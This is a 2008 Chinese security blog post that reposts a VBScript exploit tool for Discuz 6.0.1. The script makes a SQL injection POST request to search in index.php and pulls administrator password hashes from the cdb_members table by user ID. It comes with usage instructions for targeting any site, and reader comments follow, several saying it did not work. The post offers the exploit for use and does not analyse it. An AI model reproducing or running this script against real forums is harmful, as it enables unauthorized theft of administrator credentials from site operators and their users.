discuz获取任意管理员密码漏洞利用工具vbs版

2008/08/08 13:22 | 鬼仔 | 工具收集 | 占个座先

作者:Safe3
原文链接

本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版
也利于修改

以下是search.inc.php 文件漏洞利用代码VBS版

Dim strUrl,strSite,strPath,strUid

showB()
Set Args = Wscript.Arguments

If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If

strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"

Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)

Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

获得的密码大家自己在result.txt中查找

Tags: ,

相关日志

楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

  • kkkk | 2008-08-08 16:19 | #

    请问怎么输出为1.txt 后 没有密码啊

    回复该留言
  • t-h4ck | 2008-08-09 22:09 | #

    你没成功··

    回复该留言
  • knife | 2008-08-12 16:25 | #

    不行好像

    回复该留言
  • 温热威尔 | 2008-08-13 12:58 | #

    输出了很多东西 但是不知道那找到密码 晕

    回复该留言
  • 小智 | 2008-08-21 05:40 | #

    我拿了 6.0.1试了“文本里没有

    回复该留言
  • | 2008-09-09 20:20 | #

    当初你一个工具就让我安装了python,并且看了几天python的书,如今ni

    本打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版

    ~~
    气死我了

    回复该留言

发表评论